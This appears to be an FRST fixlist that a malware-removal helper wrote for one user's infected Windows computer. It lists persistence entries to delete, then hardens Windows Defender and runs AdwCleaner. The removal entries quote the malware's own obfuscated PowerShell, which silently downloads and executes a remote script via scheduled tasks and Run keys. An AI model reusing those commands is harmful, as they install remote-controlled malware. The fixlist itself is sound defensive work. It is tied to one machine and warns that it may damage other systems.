content copied
content
Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1884956365-3338842099-1994139295-1003\...\Run: [Windows PowerShell v1.0] => powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))" (No File) <==== ATTENTION
Task: {F1F8F464-E4A7-4ED4-829A-BF02ED04CE78} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.3{47263A17-2D66-43B9-9692-30514D0C1AEC} => C:\WINDOWS\system32\conhost.exe [1003520 2026-03-11] (Microsoft Windows -> Microsoft Corporation) -> --headless %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))}" <==== ATTENTION
Task: {D93FB2F3-0520-49B4-8C8D-F8450C322685} - System32\Tasks\Windows Perflog => C:\WINDOWS\system32\conhost.exe [1003520 2026-03-11] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 $env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))" <==== ATTENTION
2026-03-30 15:52 - 2024-04-07 18:13 - 000000000 ____D C:\Users\matyi\AppData\Roaming\RenPy
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys [X]
Task: {2C94177E-C279-4BCB-88AF-ACBA05968AB0} - System32\Tasks\IsSingleByte => C:\Users\matyi\AppData\Roaming\DisallowCodeDownload\IsSingleByte.exe [1779200 2026-02-18] (BC<?H8=8;I:B@D2D=>7@;3A>) [File not signed] <==== ATTENTION
Task: {960CFAA4-E369-4C79-B86B-DE8FACF55A08} - System32\Tasks\Telegram => C:\Users\matyi\AppData\Roaming\Telegram\Telegram.exe [2275328 2026-03-28] (:;7=>64495>I=86IE@7H) [File not signed] <==== ATTENTION
(:;7=>64495>I=86IE@7H) [File not signed] C:\Users\matyi\AppData\Roaming\Telegram\Telegram.exe
(svchost.exe ->) (BC<?H8=8;I:B@D2D=>7@;3A>) [File not signed] C:\Users\matyi\AppData\Roaming\DisallowCodeDownload\IsSingleByte.exe
HKU\S-1-5-21-1884956365-3338842099-1994139295-1003\...\Run: [data] => C:\Users\matyi\AppData\Local\data\data.exe [1222656 2026-03-11] (I7F<I;5A4@5HHFE@D@?JAJ5) [File not signed]
Task: {50E1AED0-E4EC-4232-874B-5672B9D8AE5B} - System32\Tasks\TargetSite => C:\Users\matyi\AppData\Local\AsUi1\ndlhiaarf\TargetSite.exe [325632 2026-02-16] () [File not signed]
2026-04-03 08:49 - 2026-04-03 08:49 - 000000000 ____D C:\ProgramData\Kujacuturi
2026-04-02 15:02 - 2026-04-02 15:02 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Ribatiqoh
2026-04-01 16:50 - 2026-04-02 16:03 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Petroglyph
2026-03-31 15:45 - 2026-03-31 15:45 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Podekes
2026-03-28 12:51 - 2026-03-28 12:51 - 000000000 ___HD C:\Users\matyi\AppData\Roaming\Telegram
2026-03-11 20:58 - 2026-03-11 20:58 - 000000000 ____D C:\Users\matyi\AppData\Local\data
2026-03-31 15:45 - 2026-03-31 15:45 - 000000000 ____D C:\ProgramData\Tadih
2026-01-17 16:20 - 2025-12-29 20:30 - 000000109 _____ () C:\ProgramData\music.vbs
2026-02-16 16:37 - 2026-02-16 16:37 - 000325632 _____ () C:\ProgramData\music.exe
2024-05-01 13:15 - 2024-05-18 08:54 - 000012288 _____ () C:\Users\matyi\AppData\Roaming\emp.bin
C:\Users\matyi\AppData\Local\AsUi1
C:\Users\matyi\AppData\Roaming\DisallowCodeDownload
StartPowershell:
Try {
$Paths=(Get-MpPreference).ExclusionPath
$Extensions=(Get-MpPreference).ExclusionExtension
$Processes=(Get-MpPreference).ExclusionProcess
foreach ($Path in $Paths) {
Remove-MpPreference -ExclusionPath $Path -force -ErrorAction Stop
}
foreach ($Extension in $Extensions) {
Remove-MpPreference -ExclusionExtension $Extension -force -ErrorAction Stop
}
foreach ($Process in $Processes) {
Remove-MpPreference -ExclusionProcess $Process -force -ErrorAction Stop
}
}
Catch {
Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
cmd: powershell -nop -c "Update-MpSignature"
cmd: powershell -nop -c "Start-MpScan -ScanType QuickScan"
# This snippet changes the Windows Defender settings to ensure stricter malware protection
cmd: powershell -nop -c "Set-MpPreference -CheckForSignaturesBeforeRunningScan 1"
cmd: powershell -nop -c "Set-MpPreference -CloudBlockLevel 2"
cmd: powershell -nop -c "Set-MpPreference -DisableArchiveScanning 0"
cmd: powershell -nop -c "Set-MpPreference -DisableAutoExclusions 1"
cmd: powershell -nop -c "Set-MpPreference -DisableBehaviorMonitoring 0"
cmd: powershell -nop -c "Set-MpPreference -DisableIOAVProtection 0"
cmd: powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring 0"
cmd: powershell -nop -c "Set-MpPreference -DisableRemovableDriveScanning 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScriptScanning 0"
cmd: powershell -nop -c "Set-MpPreference -EnableNetworkProtection Enabled"
cmd: powershell -nop -c "Set-MpPreference -MAPSReporting 2"
cmd: powershell -nop -c "Set-MpPreference -PUAProtection 1"
cmd: powershell -nop -c "Set-MpPreference -SubmitSamplesConsent 1"
cmd: powershell -nop -c "Set-MpPreference -DisableBlockAtFirstSeen 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScanningNetworkFiles 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 0"
cmd: powershell -nop -c "Set-MpPreference -DisableHeuristics 0"
cmd: powershell -nop -c "Set-MpPreference -DisableEmailScanning 0"
cmd: powershell -nop -c "Update-MpSignature"
StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
EmptyTemp:
End::
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.
To view the content, acknowledge this warning.